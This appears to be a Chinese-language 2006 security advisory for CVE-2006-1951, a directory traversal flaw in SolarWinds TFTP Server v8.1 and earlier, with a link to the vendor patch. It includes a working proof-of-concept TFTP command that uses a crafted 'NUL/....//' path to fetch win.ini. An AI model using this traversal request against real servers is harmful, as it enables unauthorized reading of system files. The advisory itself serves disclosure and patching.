发布日期：2006-04-21
更新日期：2006-04-21

受影响系统：

SolarWinds TFTP Server <= v8.1

不受影响系统：

SolarWinds TFTP Server v8.2

描述：

---

BUGTRAQ  ID: 17648
CVE(CAN) ID: CVE-2006-1951

SolarWinds TFTP服务程序可以同时发送和接收多个文件，常用于下载/上传路由器、交换机等可执行映象和配置文件。

TFTP Server对大多数类似于“../filename”的请求文件名都会进行过滤，但可通过控制文件名来绕过过滤，然后下载系统上的任意文件。

<*来源：Rapid7
  
  链接：http://www.rapid7.com/advisories/R7-0019.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ tftp 192.168.0.1
      tftp> get NUL/....//....//WINNT/win.ini
      Received 582 bytes in 0.0 seconds
      tftp> quit

      $ cat win.ini
      ; for 16-bit app support
      [fonts]
      [extensions]
      [mci extensions]
      [files]
      [Mail]
      MAPI=1

建议：

---

厂商补丁：

SolarWinds
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://solarwinds.net

浏览次数：4111
严重程度：0（网友投票）